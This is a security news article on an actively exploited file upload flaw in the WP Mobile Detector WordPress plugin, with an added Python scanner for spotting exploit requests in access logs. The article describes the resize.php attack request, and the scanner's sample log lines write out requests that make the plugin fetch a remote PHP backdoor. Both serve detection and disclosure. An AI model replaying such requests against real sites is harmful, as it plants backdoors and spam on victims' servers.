Researchers at Sucuri are reporting that the WP Mobile Detector plugin has been patched for an arbitrary file upload vulnerability that is being actively exploited in the wild. The plugin, which was temporarily removed from the WordPress Plugin Directory, had more than 10,000 active installs before the exploits began.
According to Sucuri, the majority of compromised sites have been infected with porn-related spam via the plugin’s resizing script, which fails to validate and sanitize input:
The vulnerability is very easy to exploit: all the attacker needs to do is send a request to resize.php or timthumb.php (yes, timthumb; in this case it just includes resize.php) inside the plugin directory with the backdoor URL.
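As an added example (not code from the article, Sucuri, or the plugin), the following Python check scans web server access logs for the request pattern Sucuri describes: hits on resize.php or timthumb.php inside the plugin directory whose query string carries a remote http(s) URL. The plugin directory slug, the combined log format and the sample log lines are assumptions constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumptions, not stated in the article: the plugin is installed under its
# usual slug and the web server writes Apache/Nginx "combined" log lines.
PLUGIN_DIR = "/wp-content/plugins/wp-mobile-detector/"
SCRIPTS = ("resize.php", "timthumb.php")  # timthumb.php just includes resize.php
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
REMOTE_RE = re.compile(r"^https?://", re.I)


def classify(line):
    """Return details of a request matching the exploit pattern, or None.
    A hit is any request for resize.php/timthumb.php inside the plugin directory
    whose query string carries an http(s) URL in *any* parameter, so the check
    does not depend on a particular parameter name."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = urlsplit(m.group("target"))
    script = target.path.rsplit("/", 1)[-1]
    if not target.path.startswith(PLUGIN_DIR) or script not in SCRIPTS:
        return None
    remote = [v for vals in parse_qs(target.query).values() for v in vals
              if REMOTE_RE.match(v.strip())]
    if not remote:
        return None  # local image path or no URL at all: an ordinary resize
    return {"ip": m.group("ip"), "time": m.group("ts"), "script": script,
            "remote_url": remote[0], "status": int(m.group("status"))}


def scan(lines):
    """Run classify() over an iterable of log lines and collect the hits."""
    return [hit for hit in map(classify, lines) if hit]


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [27/May/2016:10:12:01 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=http://198.51.100.23/b.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.10 - - [27/May/2016:10:12:30 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=/wp-content/uploads/photo.jpg&w=320 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
203.0.113.5 - - [27/May/2016:10:13:44 +0000] "GET /wp-content/plugins/wp-mobile-detector/timthumb.php?src=https://198.51.100.23/b.php HTTP/1.1" 200 300 "-" "Mozilla/5.0"
192.0.2.11 - - [27/May/2016:10:14:02 +0000] "GET /index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print(hit)
```

A 200 status on a hit means the fetch-and-save likely succeeded, so the cache directory the script writes to should be checked for the downloaded file.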
Sucuri offered tips on recognizing if a site has been compromised by this particular vulnerability:
You can usually find the gopni3g directory in the site root, which contains story.php (doorway generator script), .htaccess, and subdirectories with spammy files and templates.
The vulnerability was originally published on the Plugin Vulnerabilities website on May 31st, but Sucuri’s logs show that it has been actively exploited in the wild since May 27th.
Because the vulnerability was disclosed before the plugin was patched, security experts advised users to uninstall the plugin. As of today, the number of active installs has dropped from 10,000+ to 2,000+ as a result of the exploits.